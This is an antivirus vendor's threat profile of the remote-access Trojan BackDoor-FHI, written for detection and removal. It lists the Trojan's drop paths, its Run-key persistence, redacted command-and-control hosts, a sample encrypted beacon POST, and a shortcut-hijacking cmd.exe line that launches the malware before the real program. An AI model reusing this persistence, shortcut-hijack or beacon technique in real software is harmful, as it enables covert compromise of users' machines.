Virus Profile: BackDoor-FHI

Threat Search
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 8/3/2012
Date Added: 8/3/2012
Origin: N/A
Length: Varies
Type: Trojan
Subtype: Remote Access
DAT Required: 6792
Removal Instructions


This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.


  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA

Indication of Infection

Presence of above mentioned activities.

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

Virus Characteristics

Upon execution, the Trojan drops itself to the following path.
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI will likewise drop copies of itself in random areas as ‘thumbs.db[random character]’.

The following registry keys has been added to the system to allow it to automatically execute at startup:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[Random]\ [random].exe /r

The Trojan injects its own code in many random processes, and tries to connect to the following malicious hosts.

  • www.g[Removed]
  • www.e[Removed]
  • so[Removed]
  • www-pro[Removed]
  • esto[Removed]

Notes: The above mentioned URLs might change depending on geographical locations where malicious content is executed.

The malware posts some encrypted system information data to the sites above.

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...

The malware may also add or infect current document lnk files using a format similar to the below:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

The malware will then open the copy prior to opening the original target.

This Trojan is designed to download the malicious contents from websites and infect the comprised system.


All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).


PC Infected? Get Expert Help

Virus Removal Service

Connect to one of our Security Experts by phone. Have your PC fixed remotely - while you watch!